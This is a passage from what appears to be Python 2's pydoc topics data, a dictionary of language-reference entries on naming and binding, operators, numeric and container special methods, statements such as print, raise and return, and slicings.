expression list_for\n list_for ::= "for" target_list "in" old_expression_list [list_iter]\n old_expression_list ::= old_expression [("," old_expression)+ [","]]\n old_expression ::= or_test | old_lambda_expr\n list_iter ::= list_for | list_if\n list_if ::= "if" old_expression [list_iter]\n\nA list display yields a new list object. Its contents are specified\nby providing either a list of expressions or a list comprehension.\nWhen a comma-separated list of expressions is supplied, its elements\nare evaluated from left to right and placed into the list object in\nthat order. When a list comprehension is supplied, it consists of a\nsingle expression followed by at least one "for" clause and zero or\nmore "for" or "if" clauses. In this case, the elements of the new\nlist are those that would be produced by considering each of the "for"\nor "if" clauses a block, nesting from left to right, and evaluating\nthe expression to produce a list element each time the innermost block\nis reached [1].\n', 'naming': u'\nNaming and binding\n******************\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line the first argument) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n=================================\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'numbers': u'\nNumeric literals\n****************\n\nThere are four types of numeric literals: plain integers, long\nintegers, floating point numbers, and imaginary numbers. There are no\ncomplex literals (complex numbers can be formed by adding a real\nnumber and an imaginary number).\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator \'"-"\' and the\nliteral "1".\n', 'numeric-types': u'\nEmulating numeric types\n***********************\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n', 'objects': u'\nObjects, values and types\n*************************\n\n*Objects* are Python\'s abstraction for data. All data in a Python\nprogram is represented by objects or by relations between objects. (In\na sense, and in conformance to Von Neumann\'s model of a "stored\nprogram computer," code is also represented by objects.)\n\nEvery object has an identity, a type and a value. An object\'s\n*identity* never changes once it has been created; you may think of it\nas the object\'s address in memory. The \'"is"\' operator compares the\nidentity of two objects; the "id()" function returns an integer\nrepresenting its identity (currently implemented as its address). An\nobject\'s *type* is also unchangeable. [1] An object\'s type determines\nthe operations that the object supports (e.g., "does it have a\nlength?") and also defines the possible values for objects of that\ntype. The "type()" function returns an object\'s type (which is an\nobject itself). The *value* of some objects can change. Objects\nwhose value can change are said to be *mutable*; objects whose value\nis unchangeable once they are created are called *immutable*. (The\nvalue of an immutable container object that contains a reference to a\nmutable object can change when the latter\'s value is changed; however\nthe container is still considered immutable, because the collection of\nobjects it contains cannot be changed. So, immutability is not\nstrictly the same as having an unchangeable value, it is more subtle.)\nAn object\'s mutability is determined by its type; for instance,\nnumbers, strings and tuples are immutable, while dictionaries and\nlists are mutable.\n\nObjects are never explicitly destroyed; however, when they become\nunreachable they may be garbage-collected. An implementation is\nallowed to postpone garbage collection or omit it altogether --- it is\na matter of implementation quality how garbage collection is\nimplemented, as long as no objects are collected that are still\nreachable.\n\n**CPython implementation detail:** CPython currently uses a reference-\ncounting scheme with (optional) delayed detection of cyclically linked\ngarbage, which collects most objects as soon as they become\nunreachable, but is not guaranteed to collect garbage containing\ncircular references. See the documentation of the "gc" module for\ninformation on controlling the collection of cyclic garbage. Other\nimplementations act differently and CPython may change. Do not depend\non immediate finalization of objects when they become unreachable (ex:\nalways close files).\n\nNote that the use of the implementation\'s tracing or debugging\nfacilities may keep objects alive that would normally be collectable.\nAlso note that catching an exception with a \'"try"..."except"\'\nstatement may keep objects alive.\n\nSome objects contain references to "external" resources such as open\nfiles or windows. It is understood that these resources are freed\nwhen the object is garbage-collected, but since garbage collection is\nnot guaranteed to happen, such objects also provide an explicit way to\nrelease the external resource, usually a "close()" method. Programs\nare strongly recommended to explicitly close such objects. The\n\'"try"..."finally"\' statement provides a convenient way to do this.\n\nSome objects contain references to other objects; these are called\n*containers*. Examples of containers are tuples, lists and\ndictionaries. The references are part of a container\'s value. In\nmost cases, when we talk about the value of a container, we imply the\nvalues, not the identities of the contained objects; however, when we\ntalk about the mutability of a container, only the identities of the\nimmediately contained objects are implied. So, if an immutable\ncontainer (like a tuple) contains a reference to a mutable object, its\nvalue changes if that mutable object is changed.\n\nTypes affect almost all aspects of object behavior. Even the\nimportance of object identity is affected in some sense: for immutable\ntypes, operations that compute new values may actually return a\nreference to any existing object with the same type and value, while\nfor mutable objects this is not allowed. E.g., after "a = 1; b = 1",\n"a" and "b" may or may not refer to the same object with the value\none, depending on the implementation, but after "c = []; d = []", "c"\nand "d" are guaranteed to refer to two different, unique, newly\ncreated empty lists. (Note that "c = d = []" assigns the same object\nto both "c" and "d".)\n', 'operator-summary': u'\nOperator precedence\n*******************\n\nThe following table summarizes the operator precedences in Python,\nfrom lowest precedence (least binding) to highest precedence (most\nbinding). Operators in the same box have the same precedence. Unless\nthe syntax is explicitly given, operators are binary. Operators in\nthe same box group left to right (except for comparisons, including\ntests, which all have the same precedence and chain from left to right\n--- see section Comparisons --- and exponentiation, which groups from\nright to left).\n\n+-------------------------------------------------+---------------------------------------+\n| Operator | Description |\n+=================================================+=======================================+\n| "lambda" | Lambda expression |\n+-------------------------------------------------+---------------------------------------+\n| "if" -- "else" | Conditional expression |\n+-------------------------------------------------+---------------------------------------+\n| "or" | Boolean OR |\n+-------------------------------------------------+---------------------------------------+\n| "and" | Boolean AND |\n+-------------------------------------------------+---------------------------------------+\n| "not" "x" | Boolean NOT |\n+-------------------------------------------------+---------------------------------------+\n| "in", "not in", "is", "is not", "<", "<=", ">", | Comparisons, including membership |\n| ">=", "<>", "!=", "==" | tests and identity tests |\n+-------------------------------------------------+---------------------------------------+\n| "|" | Bitwise OR |\n+-------------------------------------------------+---------------------------------------+\n| "^" | Bitwise XOR |\n+-------------------------------------------------+---------------------------------------+\n| "&" | Bitwise AND |\n+-------------------------------------------------+---------------------------------------+\n| "<<", ">>" | Shifts |\n+-------------------------------------------------+---------------------------------------+\n| "+", "-" | Addition and subtraction |\n+-------------------------------------------------+---------------------------------------+\n| "*", "/", "//", "%" | Multiplication, division, remainder |\n| | [8] |\n+-------------------------------------------------+---------------------------------------+\n| "+x", "-x", "~x" | Positive, negative, bitwise NOT |\n+-------------------------------------------------+---------------------------------------+\n| "**" | Exponentiation [9] |\n+-------------------------------------------------+---------------------------------------+\n| "x[index]", "x[index:index]", | Subscription, slicing, call, |\n| "x(arguments...)", "x.attribute" | attribute reference |\n+-------------------------------------------------+---------------------------------------+\n| "(expressions...)", "[expressions...]", "{key: | Binding or tuple display, list |\n| value...}", "`expressions...`" | display, dictionary display, string |\n| | conversion |\n+-------------------------------------------------+---------------------------------------+\n\n-[ Footnotes ]-\n\n[1] In Python 2.3 and later releases, a list comprehension "leaks"\n the control variables of each "for" it contains into the\n containing scope. However, this behavior is deprecated, and\n relying on it will not work in Python 3.\n\n[2] While "abs(x%y) < abs(y)" is true mathematically, for floats\n it may not be true numerically due to roundoff. For example, and\n assuming a platform on which a Python float is an IEEE 754 double-\n precision number, in order that "-1e-100 % 1e100" have the same\n sign as "1e100", the computed result is "-1e-100 + 1e100", which\n is numerically exactly equal to "1e100". The function\n "math.fmod()" returns a result whose sign matches the sign of the\n first argument instead, and so returns "-1e-100" in this case.\n Which approach is more appropriate depends on the application.\n\n[3] If x is very close to an exact integer multiple of y, it\'s\n possible for "floor(x/y)" to be one larger than "(x-x%y)/y" due to\n rounding. In such cases, Python returns the latter result, in\n order to preserve that "divmod(x,y)[0] * y + x % y" be very close\n to "x".\n\n[4] While comparisons between unicode strings make sense at the\n byte level, they may be counter-intuitive to users. For example,\n the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" compare differently,\n even though they both represent the same unicode character (LATIN\n CAPITAL LETTER C WITH CEDILLA). To compare strings in a human\n recognizable way, compare using "unicodedata.normalize()".\n\n[5] The implementation computes this efficiently, without\n constructing lists or sorting.\n\n[6] Earlier versions of Python used lexicographic comparison of\n the sorted (key, value) lists, but this was very expensive for the\n common case of comparing for equality. An even earlier version of\n Python compared dictionaries by identity only, but this caused\n surprises because people expected to be able to test a dictionary\n for emptiness by comparing it to "{}".\n\n[7] Due to automatic garbage-collection, free lists, and the\n dynamic nature of descriptors, you may notice seemingly unusual\n behaviour in certain uses of the "is" operator, like those\n involving comparisons between instance methods, or constants.\n Check their documentation for more info.\n\n[8] The "%" operator is also used for string formatting; the same\n precedence applies.\n\n[9] The power operator "**" binds less tightly than an arithmetic\n or bitwise unary operator on its right, that is, "2**-1" is "0.5".\n', 'pass': u'\nThe "pass" statement\n********************\n\n pass_stmt ::= "pass"\n\n"pass" is a null operation --- when it is executed, nothing happens.\nIt is useful as a placeholder when a statement is required\nsyntactically, but no code needs to be executed, for example:\n\n def f(arg): pass # a function that does nothing (yet)\n\n class C: pass # a class with no methods (yet)\n', 'power': u'\nThe power operator\n******************\n\nThe power operator binds more tightly than unary operators on its\nleft; it binds less tightly than unary operators on its right. The\nsyntax is:\n\n power ::= primary ["**" u_expr]\n\nThus, in an unparenthesized sequence of power and unary operators, the\noperators are evaluated from right to left (this does not constrain\nthe evaluation order for the operands): "-1**2" results in "-1".\n\nThe power operator has the same semantics as the built-in "pow()"\nfunction, when called with two arguments: it yields its left argument\nraised to the power of its right argument. The numeric arguments are\nfirst converted to a common type. The result type is that of the\narguments after coercion.\n\nWith mixed operand types, the coercion rules for binary arithmetic\noperators apply. For int and long int operands, the result has the\nsame type as the operands (after coercion) unless the second argument\nis negative; in that case, all arguments are converted to float and a\nfloat result is delivered. For example, "10**2" returns "100", but\n"10**-2" returns "0.01". (This last feature was added in Python 2.2.\nIn Python 2.1 and before, if both arguments were of integer types and\nthe second argument was negative, an exception was raised).\n\nRaising "0.0" to a negative power results in a "ZeroDivisionError".\nRaising a negative number to a fractional power results in a\n"ValueError".\n', 'print': u'\nThe "print" statement\n*********************\n\n print_stmt ::= "print" ([expression ("," expression)* [","]]\n | ">>" expression [("," expression)+ [","]])\n\n"print" evaluates each expression in turn and writes the resulting\nobject to standard output (see below). If an object is not a string,\nit is first converted to a string using the rules for string\nconversions. The (resulting or original) string is then written. A\nspace is written before each object is (converted and) written, unless\nthe output system believes it is positioned at the beginning of a\nline. This is the case (1) when no characters have yet been written\nto standard output, (2) when the last character written to standard\noutput is a whitespace character except "\' \'", or (3) when the last\nwrite operation on standard output was not a "print" statement. (In\nsome cases it may be functional to write an empty string to standard\noutput for this reason.)\n\nNote: Objects which act like file objects but which are not the\n built-in file objects often do not properly emulate this aspect of\n the file object\'s behavior, so it is best not to rely on this.\n\nA "\'\\n\'" character is written at the end, unless the "print" statement\nends with a comma. This is the only action if the statement contains\njust the keyword "print".\n\nStandard output is defined as the file object named "stdout" in the\nbuilt-in module "sys". If no such object exists, or if it does not\nhave a "write()" method, a "RuntimeError" exception is raised.\n\n"print" also has an extended form, defined by the second portion of\nthe syntax described above. This form is sometimes referred to as\n""print" chevron." In this form, the first expression after the ">>"\nmust evaluate to a "file-like" object, specifically an object that has\na "write()" method as described above. With this extended form, the\nsubsequent expressions are printed to this file object. If the first\nexpression evaluates to "None", then "sys.stdout" is used as the file\nfor output.\n', 'raise': u'\nThe "raise" statement\n*********************\n\n raise_stmt ::= "raise" [expression ["," expression ["," expression]]]\n\nIf no expressions are present, "raise" re-raises the last exception\nthat was active in the current scope. If no exception is active in\nthe current scope, a "TypeError" exception is raised indicating that\nthis is an error (if running under IDLE, a "Queue.Empty" exception is\nraised instead).\n\nOtherwise, "raise" evaluates the expressions to get three objects,\nusing "None" as the value of omitted expressions. The first two\nobjects are used to determine the *type* and *value* of the exception.\n\nIf the first object is an instance, the type of the exception is the\nclass of the instance, the instance itself is the value, and the\nsecond object must be "None".\n\nIf the first object is a class, it becomes the type of the exception.\nThe second object is used to determine the exception value: If it is\nan instance of the class, the instance becomes the exception value. If\nthe second object is a tuple, it is used as the argument list for the\nclass constructor; if it is "None", an empty argument list is used,\nand any other object is treated as a single argument to the\nconstructor. The instance so created by calling the constructor is\nused as the exception value.\n\nIf a third object is present and not "None", it must be a traceback\nobject (see section The standard type hierarchy), and it is\nsubstituted instead of the current location as the place where the\nexception occurred. If the third object is present and not a\ntraceback object or "None", a "TypeError" exception is raised. The\nthree-expression form of "raise" is useful to re-raise an exception\ntransparently in an except clause, but "raise" with no expressions\nshould be preferred if the exception to be re-raised was the most\nrecently active exception in the current scope.\n\nAdditional information on exceptions can be found in section\nExceptions, and information about handling exceptions is in section\nThe try statement.\n', 'return': u'\nThe "return" statement\n**********************\n\n return_stmt ::= "return" [expression_list]\n\n"return" may only occur syntactically nested in a function definition,\nnot within a nested class definition.\n\nIf an expression list is present, it is evaluated, else "None" is\nsubstituted.\n\n"return" leaves the current function call with the expression list (or\n"None") as return value.\n\nWhen "return" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nfunction.\n\nIn a generator function, the "return" statement is not allowed to\ninclude an "expression_list". In that context, a bare "return"\nindicates that the generator is done and will cause "StopIteration" to\nbe raised.\n', 'sequence-types': u'\nEmulating container types\n*************************\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n', 'shifting': u'\nShifting operations\n*******************\n\nThe shifting operations have lower priority than the arithmetic\noperations:\n\n shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n\nThese operators accept plain or long integers as arguments. The\narguments are converted to a common type. They shift the first\nargument to the left or right by the number of bits given by the\nsecond argument.\n\nA right shift by *n* bits is defined as division by "pow(2, n)". A\nleft shift by *n* bits is defined as multiplication with "pow(2, n)".\nNegative shift counts raise a "ValueError" exception.\n\nNote: In the current implementation, the right-hand operand is\n required to be at most "sys.maxsize". If the right-hand operand is\n larger than "sys.maxsize" an "OverflowError" exception is raised.\n', 'slicings': u'\nSlicings\n********\n\nA slicing selects a range of items in a sequence object (e.g., a\nstring, tuple or list). Slicings may be used as expressions or as\ntargets in assignment or "del" statements. The syntax for a slicing:\n\n slicing ::= simple_slicing | extended_slicing\n simple_slicing ::= primary "[" short_slice "]"\n extended_slicing ::= primary "[" slice_list "]"\n slice_list ::= slice_item ("," slice_item)* [","]\n slice_item ::= expression | proper_slice | ellipsis\n proper_slice ::= short_slice | long_slice\n short_slice ::= [lower_bound] ":" [upper_bound]\n long_slice ::= short_slice ":" [stride]\n lower_bound ::= expression\n upper_bound ::= expression\n stride ::= expression\n ellipsis ::= "..."\n\nThere is ambiguity in the formal syntax here: anything that looks like\nan expression list also looks like a slice list, so any subscription\ncan be interpreted as a slicing. Rather than further complicating the\nsyntax, this is disambiguated by defining that in this case the\ninterpretation as a subscription takes priority over the\ninterpretation as a slicing (this is the case if the slice list\ncontains no proper slice nor ellipses). Similarly, when the slice\nlist has exactly one short slice and no trailing comma, the\ninterpretation as a simple slicing takes priority over that as an\nextended slicing.\n\nThe semantics for a simple slicing are as follows. The primary must\nevaluate to a sequence object. The lower and upper bound expressions,\nif present, must evaluate to plain integers; defaults are zero and the\n"sys.maxint", respectively. If either bound is negative, the\nsequence\'s length is added to it. The slicing now selects all items\nwith index *k* such that "i <= k < j" where *i* and *j* are the\nspecified lower and upper bounds. This may be an empty sequence. It\nis not an error if *i* or *j* lie outside the range of valid indexes\n(such items don\'t exist so they aren\'t selected).\n\nThe semantics for an extended slicing are as follows. The primary\nmust evaluate to a mapping object, and it is indexed with a key that\nis constructed from the slice list, as follows. If the slice list\ncontains at least one comma, the key is a tuple containing the\nconversion of the slice items; otherwise, the conversion of the lone\nslice item is the key. The conversion of a slice item that is an\nexpression is that expression. The conversion of an ellipsis slice\nitem is the built-in "Ellipsis" object. The conversion of a proper\nslice is a slice object (see section The standard type hierarchy)\nwhose "start", "stop" and "step" attributes are the values of the\nexpressions given as lower bound, upper bound and stride,\nrespectively, substituting "None" for missing expressions.\n', 'specialattrs': u'\nSpecial Attributes\n******************\n\nThe implementation adds a few special read-only attributes to several\nobject types, where they are relevant. Some of these are not reported\nby the "dir()" built-in function.\n\nobject.__dict__\n\n A dictionary or other mapping object used to store an object\'s\n (writable) attributes.\n\nobject.__methods__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\nobject.__members__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\ninstance.__class__\n\n The class to which a class instance belongs.\n\nclass.__bases__\n\n The tuple of base classes of a class object.\n\nclass.__name__\n\n The name of the class or type.\n\nThe following attributes are only supported by *new-style class*es.\n\nclass.__mro__\n\n This attribute is a tuple of classes that are considered when\n looking for base classes during method resolution.\n\nclass.mro()\n\n This method can be overridden by a metaclass to customize the\n method resolution order for its instances. It is called at class\n instantiation, and its result is stored in "__mro__".\n\nclass.__subclasses__()\n\n Each new-style class keeps a list of weak references to its\n immediate subclasses. This method returns a list of all those\n references still alive. Example:\n\n >>> int.__subclasses__()\n [<type \'bool\'>]\n\n-[ Footnotes 